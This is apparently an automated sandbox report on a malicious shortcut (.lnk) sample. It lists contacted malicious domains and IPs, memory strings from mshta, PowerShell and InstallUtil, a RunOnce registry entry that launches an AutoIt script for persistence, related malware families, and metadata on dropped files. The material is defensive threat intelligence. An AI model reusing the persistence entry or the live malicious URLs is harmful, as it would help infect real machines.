https://static.klipxuhaq.shop/3VKKE.mp4s	mshta.exe, 00000006.00000003.1579811940.0000024660854000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1580679477.0000024660854000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000002.1591232577.0000024660854000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1584878876.0000024660854000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://login.li	mshta.exe, 00000006.00000003.1578774556.0000024660876000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000002.1591318527.0000024660878000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://static.klipxuhaq.shop/3VKKE.mp42cU3	mshta.exe, 00000006.00000003.1405103765.0000024E6345D000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://static.klipxuhaq.shop/3VKKE.mp42cv3	mshta.exe, 00000006.00000003.1405103765.0000024E6345D000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://csp-invoices-v5.com	powershell.exe, 00000009.00000002.1452751540.0000028DD674B000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://contoso.com/Icon	powershell.exe, 0000000B.00000002.1728955596.000002003C295000.00000004.00000800.00020000.00000000.sdmp	false		high
https://static.klipxuhaq.shop/3VKKE.mp4LMEMP	mshta.exe, 00000006.00000003.1580592459.0000024E674FE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000002.1593693710.0000024E674FE000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	InstallUtil.exe, 00000015.00000002.3807114971.0000000002D8B000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000015.00000002.3826799107.0000000003930000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000015.00000002.3807114971.0000000002C5A000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000015.00000002.3807114971.0000000002DE9000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000015.00000002.3807114971.0000000002BFB000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.ver)	svchost.exe, 00000008.00000002.3047102388.000001D929411000.00000004.00000020.00020000.00000000.sdmp	false		high
https://static.kX	powershell.exe, 00000005.00000002.1370748747.00000186BBDBB000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://static.klipxuhaq.shop/3VKKE.mp4...p7CcN	mshta.exe, 00000006.00000002.1592677380.0000024E63441000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://static.klipxuhaq.shop/1	mshta.exe, 00000006.00000003.1578774556.0000024660888000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000002.1591318527.0000024660888000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.ecosia.org/newtab/	InstallUtil.exe, 00000015.00000002.3807114971.0000000002D8B000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000015.00000002.3826799107.0000000003930000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000015.00000002.3807114971.0000000002C5A000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000015.00000002.3807114971.0000000002E4A000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000015.00000002.3807114971.0000000002DE9000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000015.00000002.3807114971.0000000002BFB000.00000004.00000800.00020000.00000000.sdmp	false		high
https://static.klipxuhaq.shop/3VKKE.mp4https://static.klipxuhaq.shop/3VKKE.mp4;	mshta.exe, 00000006.00000003.1586876351.0000024E67A6D000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://github.com/Pester/Pester	powershell.exe, 0000000B.00000002.1610462862.000002002C454000.00000004.00000800.00020000.00000000.sdmp	false		high
https://static.klipxuhaq.shop/3VKKE.mp4https://static.klipxuhaq.shop/3VKKE.mp4if	mshta.exe, 00000006.00000003.1586876351.0000024E67A6D000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://go.mic	InstallUtil.exe, 00000019.00000002.1839357816.000000000109C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://static.klipxuhaq.shop/3VKKE.mp4https://static.klipxuhaq.shop/3VKKE.mp4=	mshta.exe, 00000006.00000003.1586876351.0000024E67A6D000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://ac.ecosia.org/autocomplete?q=	InstallUtil.exe, 00000015.00000002.3807114971.0000000002D8B000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000015.00000002.3826799107.0000000003930000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000015.00000002.3807114971.0000000002C5A000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000015.00000002.3807114971.0000000002E4A000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000015.00000002.3807114971.0000000002DE9000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000015.00000002.3807114971.0000000002BFB000.00000004.00000800.00020000.00000000.sdmp	false		high
http://purl.oena	InstallUtil.exe, 00000015.00000002.3844536483.00000000078D2000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://static.klipxuhaq.shop/	mshta.exe, 00000006.00000003.1578774556.0000024660888000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000002.1591318527.0000024660888000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
https://static.klipxuhaq.shop/3VKKE.mp4...x	mshta.exe, 00000006.00000002.1592677380.0000024E63441000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://static.klipxuhaq.shop/3VKKE.mp4X?	mshta.exe, 00000006.00000003.1579811940.000002466081C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1584878876.000002466081D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1580679477.000002466081D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000002.1591232577.000002466081D000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://static.klipxuhaq.shop/3VKKE.mp4ystem32	powershell.exe, 00000005.00000002.1370530972.00000186B9B20000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://static.klipxuhaq.shop/3VKKE.mp4private	mshta.exe, 00000006.00000003.1586876351.0000024E67A6D000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://aka.ms/pscore68	powershell.exe, 00000004.00000002.1380328709.0000024F89F7A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1370748747.00000186BB97E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1370748747.00000186BB95A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1452751540.0000028DD62A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1610462862.000002002C221000.00000004.00000800.00020000.00000000.sdmp	false		high
https://csp-invoices-v5.com/pdf/cloudviewer/ref095vq842r70/3rd/party/authorisation/form/20241210/doc	powershell.exe, 00000009.00000002.1452751540.0000028DD8139000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1452751540.0000028DD64CD000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	InstallUtil.exe, 00000015.00000002.3807114971.0000000002D8B000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000015.00000002.3826799107.0000000003930000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000015.00000002.3807114971.0000000002C5A000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000015.00000002.3807114971.0000000002E4A000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000015.00000002.3807114971.0000000002DE9000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000015.00000002.3807114971.0000000002BFB000.00000004.00000800.00020000.00000000.sdmp	false		high
https://static.klipxuhaq.shop/3VKKE.mp4C:	mshta.exe, 00000006.00000003.1588725610.00000246608A4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1589642644.00000246608B9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000002.1591118375.00000246607E0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000002.1591517566.00000246608BA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1578774556.00000246608A4000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://csp-invoices-v5.com	powershell.exe, 00000009.00000002.1452751540.0000028DD673E000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
104.21.48.1	static.klipxuhaq.shop	United States	13335	CLOUDFLARENETUS	true
83.166.133.91	csp-invoices-v5.com	Switzerland	29222	INFOMANIAK-ASCH	false
188.114.97.6	cndef1.green-pathways.shop	European Union	13335	CLOUDFLARENETUS	false
92.255.57.75	unknown	Russian Federation	42253	TELSPRU	true

Private

IP
127.0.0.1

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1576538
Start date and time:	2024-12-17 08:37:12 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 14m 28s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	33
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	sEOELQpFOB.lnk renamed because original name is a hash value
Original Sample Name:	3a1a340bf1283ba3c30c49c57103c5a3218771910256c8b0d92b94f7a1513f4e.lnk.d.lnk
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winLNK@46/106@10/5
EGA Information:	Successful, ratio: 37.5%
HCA Information:	Successful, ratio: 99% Number of executed functions: 106 Number of non-executed functions: 294
Cookbook Comments:	Found application associated with file extension: .lnk Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, backgroundTaskHost.exe
Excluded IPs from analysis (whitelisted): 2.16.229.162, 172.64.41.3, 162.159.61.3, 23.218.208.137, 199.232.210.172, 23.203.161.57, 23.32.239.56, 2.19.198.27, 2.20.40.170, 2.20.68.228, 2.20.68.207, 23.195.39.65, 13.107.246.43, 4.175.87.197, 50.16.47.176
Excluded domains from analysis (whitelisted): chrome.cloudflare-dns.com, e4578.dscg.akamaiedge.net, fs.microsoft.com, e8652.dscx.akamaiedge.net, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, acroipm2.adobe.com.edgesuite.net, e4578.dscb.akamaiedge.net, ctldl.windowsupdate.com, p13n.adobe.io, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, acroipm2.adobe.com, fe3cr.delivery.mp.microsoft.com, ssl.adobe.com.edgekey.net, armmf.adobe.com, ssl-delivery.adobe.com.edgekey.net, e16604.g.akamaiedge.net, a122.dscd.akamai.net, prod.fs.microsoft.com.akadns.net, geo2.adobe.com, wu-b-net.trafficmanager.net, crl.root-x1.letsencrypt.org.edgekey.net
Execution Graph export aborted for target mshta.exe, PID 8188 because there are no executed function
Execution Graph export aborted for target powershell.exe, PID 1080 because it is empty
Execution Graph export aborted for target powershell.exe, PID 7036 because it is empty
Execution Graph export aborted for target powershell.exe, PID 7952 because it is empty
Execution Graph export aborted for target powershell.exe, PID 8108 because it is empty
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size exceeded maximum capacity and may have missing network information.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtEnumerateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
02:38:21	API Interceptor	3x Sleep call for process: svchost.exe modified
02:38:22	API Interceptor	105x Sleep call for process: powershell.exe modified
02:38:39	API Interceptor	2x Sleep call for process: AcroCEF.exe modified
02:38:48	API Interceptor	1922196x Sleep call for process: InstallUtil.exe modified
08:38:50	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce bhcbhah "C:\ehcfdbh\AutoIt3.exe" C:\ehcfdbh\bhcbhah.a3x
08:38:59	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\RunOnce bhcbhah "C:\ehcfdbh\AutoIt3.exe" C:\ehcfdbh\bhcbhah.a3x

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
104.21.48.1	SH8ZyOWNi2.exe	Get hash	malicious	CMSBrute	Browse	twirpx.org/administrator/index.php
104.21.48.1	SN500, SN150 Spec.exe	Get hash	malicious	FormBook	Browse	www.antipromil.site/7ykh/
188.114.97.6	236236236.elf	Get hash	malicious	Unknown	Browse	hollweghospitality.com/wp-login.php
	RFQ_P.O.1212024.scr	Get hash	malicious	FormBook	Browse	www.questmatch.pro/1yxc/
	8WgZHDQckx.exe	Get hash	malicious	Pony	Browse	www.dynamotouren.com/?dynamotouren.de
	fUHl7rElXU.xlsx	Get hash	malicious	Unknown	Browse	paste.ee/d/OARvm
	ibk0BQaWAo.exe	Get hash	malicious	Unknown	Browse	orbitdownloader.com/
	ibk0BQaWAo.exe	Get hash	malicious	Unknown	Browse	orbitdownloader.com/
	INVOICE087667899.exe	Get hash	malicious	Unknown	Browse	heygirlisheeverythingyouwantedinaman.comheygirlisheeverythingyouwantedinaman.com:443
	ZciowjM9hN.exe	Get hash	malicious	Lokibot	Browse	vmopahtqdf84hfvsqepalcbcch63gdyvah.ml/BN2/fre.php

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
cndef1.green-pathways.shop	Instruction_695-18112-002_Rev.PDF.lnk.d.lnk	Get hash	malicious	Unknown	Browse	104.21.83.229
bg.microsoft.map.fastly.net	payload_1.hta	Get hash	malicious	RedLine	Browse	199.232.210.172
	ei0woJS3Dy.lnk	Get hash	malicious	Unknown	Browse	199.232.214.172
	BKT2HSG6sZ.exe	Get hash	malicious	RedLine	Browse	199.232.214.172
	69633f.msi	Get hash	malicious	Vidar	Browse	199.232.214.172
	fsg5PWtTm2.lnk	Get hash	malicious	RedLine, SectopRAT	Browse	199.232.210.172
	SkaKk8Z1J0.exe	Get hash	malicious	LummaC	Browse	199.232.214.172
	#U041e#U043f#U043b#U0430#U0442#U0430.xls	Get hash	malicious	Unknown	Browse	199.232.210.172
	Client-built.exe	Get hash	malicious	Quasar	Browse	199.232.210.172
	wayneenterprisesbatcave-6.0.1901-windows-installer.msi	Get hash	malicious	ScreenConnect Tool	Browse	199.232.214.172
	Untitled-1.exe	Get hash	malicious	CobaltStrike, Metasploit	Browse	199.232.210.172
static.klipxuhaq.shop	ei0woJS3Dy.lnk	Get hash	malicious	Unknown	Browse	104.21.48.1
static.klipxuhaq.shop	tz1WicW6sG.lnk	Get hash	malicious	Unknown	Browse	104.21.48.1

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	payload_1.hta	Get hash	malicious	RedLine	Browse	104.21.87.65
	PAYMENT ADVICE TT07180016-24_pdf.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	104.21.67.152
	bxAoaISZJQ.lnk	Get hash	malicious	Unknown	Browse	172.67.139.105
	ei0woJS3Dy.lnk	Get hash	malicious	Unknown	Browse	172.67.140.151
	tz1WicW6sG.lnk	Get hash	malicious	Unknown	Browse	188.114.96.6
	pre-stowage.PDF.scr.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	172.67.177.134
	HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.67.152
	https://quarantine-emails13122024bcpe038qua8303rantine0832411.s3.eu-central-3.ionoscloud.com/message.html#anneke.hanekom@mmiholdings.co.za	Get hash	malicious	HTMLPhisher	Browse	104.18.11.207
	Assinar_PDF_3476.lNK.lnk	Get hash	malicious	Unknown	Browse	104.21.32.1
	hesaphareketi-01.pdf.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.67.152
INFOMANIAK-ASCH	Order No 24.exe	Get hash	malicious	FormBook	Browse	128.65.195.180
	RFQ.exe	Get hash	malicious	FormBook	Browse	128.65.195.180
	statement of accounts.exe	Get hash	malicious	FormBook	Browse	128.65.195.180
	RFQ.exe	Get hash	malicious	FormBook	Browse	128.65.195.180
	RFQ.exe	Get hash	malicious	FormBook	Browse	128.65.195.180
	XhAQ0Rk63O.exe	Get hash	malicious	FormBook	Browse	128.65.195.180
	https://www.google.com/url?q=https://www.google.la/amp/s/mail.ccuk.edu.ng/home/&ust=1729769376151000&usg=AOvVaw1rOQXXFFFEiE_w3hFls1yL	Get hash	malicious	Ratty	Browse	128.65.195.91
	https://www.google.com/url?q=https://www.google.la/amp/s/mail.ccuk.edu.ng/home/&ust=1729769376151000&usg=AOvVaw1rOQXXFFFEiE_w3hFls1yL	Get hash	malicious	Ratty	Browse	128.65.195.91
	z95ordemdecomprapdfx4672xx.exe	Get hash	malicious	FormBook	Browse	84.16.66.164
	Doc.exe	Get hash	malicious	Sliver	Browse	128.65.199.135
CLOUDFLARENETUS	payload_1.hta	Get hash	malicious	RedLine	Browse	104.21.87.65
	PAYMENT ADVICE TT07180016-24_pdf.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	104.21.67.152
	bxAoaISZJQ.lnk	Get hash	malicious	Unknown	Browse	172.67.139.105
	ei0woJS3Dy.lnk	Get hash	malicious	Unknown	Browse	172.67.140.151
	tz1WicW6sG.lnk	Get hash	malicious	Unknown	Browse	188.114.96.6
	pre-stowage.PDF.scr.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	172.67.177.134
	HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.67.152
	https://quarantine-emails13122024bcpe038qua8303rantine0832411.s3.eu-central-3.ionoscloud.com/message.html#anneke.hanekom@mmiholdings.co.za	Get hash	malicious	HTMLPhisher	Browse	104.18.11.207
	Assinar_PDF_3476.lNK.lnk	Get hash	malicious	Unknown	Browse	104.21.32.1
	hesaphareketi-01.pdf.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.67.152

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
3b5074b1b5d032e5620f69f9f700ff0e	payload_1.hta	Get hash	malicious	RedLine	Browse	83.166.133.91 188.114.97.6
	PAYMENT ADVICE TT07180016-24_pdf.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	83.166.133.91 188.114.97.6
	ei0woJS3Dy.lnk	Get hash	malicious	Unknown	Browse	83.166.133.91 188.114.97.6
	tz1WicW6sG.lnk	Get hash	malicious	Unknown	Browse	83.166.133.91 188.114.97.6
	pre-stowage.PDF.scr.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	83.166.133.91 188.114.97.6
	HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	83.166.133.91 188.114.97.6
	https://quarantine-emails13122024bcpe038qua8303rantine0832411.s3.eu-central-3.ionoscloud.com/message.html#anneke.hanekom@mmiholdings.co.za	Get hash	malicious	HTMLPhisher	Browse	83.166.133.91 188.114.97.6
	Sublabially.vbs	Get hash	malicious	Remcos, GuLoader	Browse	83.166.133.91 188.114.97.6
	Brokerage Invoice.pdf.vbs	Get hash	malicious	Unknown	Browse	83.166.133.91 188.114.97.6
	Nueva orden de compra-836528268278278.xlsx.exe	Get hash	malicious	Unknown	Browse	83.166.133.91 188.114.97.6
37f463bf4616ecd445d4a1937da06e19	PAYMENT ADVICE TT07180016-24_pdf.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	104.21.48.1
	bxAoaISZJQ.lnk	Get hash	malicious	Unknown	Browse	104.21.48.1
	ei0woJS3Dy.lnk	Get hash	malicious	Unknown	Browse	104.21.48.1
	tz1WicW6sG.lnk	Get hash	malicious	Unknown	Browse	104.21.48.1
	Assinar_PDF_3476.lNK.lnk	Get hash	malicious	Unknown	Browse	104.21.48.1
	Sublabially.vbs	Get hash	malicious	Remcos, GuLoader	Browse	104.21.48.1
	69633f.msi	Get hash	malicious	Vidar	Browse	104.21.48.1
	DG55Gu1yGM.exe	Get hash	malicious	LummaC	Browse	104.21.48.1
	he55PbvM2G.exe	Get hash	malicious	LummaC	Browse	104.21.48.1
	fsg5PWtTm2.lnk	Get hash	malicious	RedLine, SectopRAT	Browse	104.21.48.1

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\AppData\Local\Temp\71532689\updater.exe	payload_1.hta	Get hash	malicious	RedLine	Browse
	fsg5PWtTm2.lnk	Get hash	malicious	RedLine, SectopRAT	Browse
	Whatsapp-GUI.exe	Get hash	malicious	DarkGate, MailPassView	Browse
	Whatsapp-GUI.exe	Get hash	malicious	DarkGate, MailPassView	Browse
	Agreement for Cooperation.PDF.lnk.download.lnk	Get hash	malicious	RedLine	Browse
	malware.zip	Get hash	malicious	Unknown	Browse
	Dark_drop_2_pers_lum_clean.exe.bin.exe	Get hash	malicious	LummaC, DarkGate, LummaC Stealer, MailPassView	Browse
	Agreement for YouTube cooperation.pdf.lnk.download.lnk	Get hash	malicious	LummaC	Browse
	3rd_cc_form_Oct_2024.pdf.lnk.download.lnk	Get hash	malicious	LummaC	Browse
	tQ6Z4Vjp5f.lnk	Get hash	malicious	LummaC	Browse
C:\ehcfdbh\AutoIt3.exe	payload_1.hta	Get hash	malicious	RedLine	Browse
	fsg5PWtTm2.lnk	Get hash	malicious	RedLine, SectopRAT	Browse
	Whatsapp-GUI.exe	Get hash	malicious	DarkGate, MailPassView	Browse
	Whatsapp-GUI.exe	Get hash	malicious	DarkGate, MailPassView	Browse
	Agreement for Cooperation.PDF.lnk.download.lnk	Get hash	malicious	RedLine	Browse
	malware.zip	Get hash	malicious	Unknown	Browse
	Dark_drop_2_pers_lum_clean.exe.bin.exe	Get hash	malicious	LummaC, DarkGate, LummaC Stealer, MailPassView	Browse
	Agreement for YouTube cooperation.pdf.lnk.download.lnk	Get hash	malicious	LummaC	Browse
	3rd_cc_form_Oct_2024.pdf.lnk.download.lnk	Get hash	malicious	LummaC	Browse
	tQ6Z4Vjp5f.lnk	Get hash	malicious	LummaC	Browse

Created / dropped Files

C:\ProgramData\Microsoft\Network\Downloader\edb.chk

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	8192
Entropy (8bit):	0.35999246155449205
Encrypted:	false
SSDEEP:	6:6xroaaD0JOCEfMuaaD0JOCEfMKQmDUxroaaD0JOCEfMuaaD0JOCEfMKQmD:JaaD0JcaaD0JwQQHaaD0JcaaD0JwQQ
MD5:	8E4D539900F876E292F2677EDA0D342B
SHA1:	BF23113E754A74685EDD474356D8B66487D24B20
SHA-256:	EAFAC5F555827CAF427E5B6D4DE23E38DE781E7BE1B16A7F75F4DCA3C56A341D
SHA-512:	6CDF88902FDF82D97DB8E8DFD8FC7A1820A8C8D11544AA66229F6F6C2DF3CFBBC73E0C3B569A6B5499F2426FD9BEA01833F1740E59B4FF3493937042EA55B070
Malicious:	false
Preview:	*.>...........v.....D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@......................................................v.............................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Network\Downloader\edb.log

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	1310720
Entropy (8bit):	0.8049087558372501
Encrypted:	false
SSDEEP:	1536:CJD1YBdWK7S50AhnZ0Ag0ALzJVEbJBJlPVPEH3cNkPfF7Njg9QaQfOgFrGXuE5TC:CJC5rk0X+MbJ72D4qgfiaDhvO7VMBfp
MD5:	ED2EDA0B171D58A6D9C86ECC5729040E
SHA1:	230BD15314E77DCD509E39B372C20D4B380B1A39
SHA-256:	19B4CE294952860A8E32F94E0A6916CAF4BA3942ABC6157A1C9D039B8531024D
SHA-512:	53DBDBA51D1DA3875C926A07F9EAD9644BC833D64CB7F5A5781CD5E90DA0B0296C43364C7DA5CAF1BE2B47E2700606A93C778009D14FDBECE0BCEF20DC5005BA
Malicious:	false
Preview:	dg".........@..@%9...{...;...{..........<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@....................................T.....#.........`h.................h.......0.......X\...;...{..................C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b....................................................................................................................................................................

C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	Extensible storage engine DataBase, version 0x620, checksum 0x0bb69f3c, page size 16384, Windows version 10.0
Category:	dropped
Size (bytes):	1310720
Entropy (8bit):	0.6465659146534722
Encrypted:	false
SSDEEP:	1536:dSB2ESB2SSjlK/Abl906Z546I50AEzJRYkr3g16Xj2UPkLk+kzLKho38o31N1ndH:dazaqbvHIM2UnWlW
MD5:	BB72183721206D38EB9A99FAF6A33CA7
SHA1:	21559E38F97A987836AB22A5FB6B9F2BCAC60666
SHA-256:	B10BD83CED802F7610BDA2EEFCE7480984D80A5A0ABF94A691782C8619435EFA
SHA-512:	A07B943EC5D670025708828CEEDA2E7AEE6CC4F63B89639D2784A8BA2B12623E0BDB7A76CF5AA8242B4B4AE9EFD38E795A329A6F0996EFDA4706F9CB217AB1C7
Malicious:	false
Preview:	...<... ...............X\...;...{......................0.u.....")...\|...&...\|{.h.r.....")...\|..0.u.........D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ............................................................................................................................................................................................................2...{..................................'.a.")...\|....................5}")...\|...........................#......0.u.....................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	16384
Entropy (8bit):	0.08047000948541319
Encrypted:	false
SSDEEP:	3:BmEetYeHb2oWxXWeIbV00lxopYxXallRl3/lllllZM4lll:QdzHRWxLI3ApYxe1/llD
MD5:	64B9031012234B819F11A637E48723CD
SHA1:	3677D1A37F704D17D70D3DCC11700E189F2F6DC9
SHA-256:	8D0FCB78D3ADE17E2F947B66CDB0A836D0EDE3379A3316454289FA88E695EF57
SHA-512:	BBC32D7D6A25133C90934C0186ACB6A854710A8544718A7C6FD12A4B6DD40615EEC912694950323B18D10B42A19C00148DEBC39809D1520B535DA3AE17A3273B
Malicious:	false
Preview:	Ov.......................................;...{...&...\|..")...\|..........")...\|%.")...\|e.u:.0")...\|e...................5}")...\|..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	292
Entropy (8bit):	5.1870699308845145
Encrypted:	false
SSDEEP:	6:7JuVq2PsZ2nKuAl9OmbnIFUt8OzgZmw+OzIkwOsZ2nKuAl9OmbjLJ:7JuVvkcHAahFUt8Ozg/+OzI51cHAaSJ
MD5:	5B21C8AE944B1A08C72D54A6991B0AB6
SHA1:	890E708BCF60A491026C16F8EB1002E9DDD0C12F
SHA-256:	E9473A00908BE3375D54B900367F5C94C153E550350CD7071A77DEE898A96BE4
SHA-512:	CF2D34C0C279C16E1DE9BD2DCBCD5798D9267366EA8A7D02D2F926137EA56A87944A4A3A9767B3B8B5CB61FB2E51476C0B6BB307284AA31D9743EF47091EA998
Malicious:	false
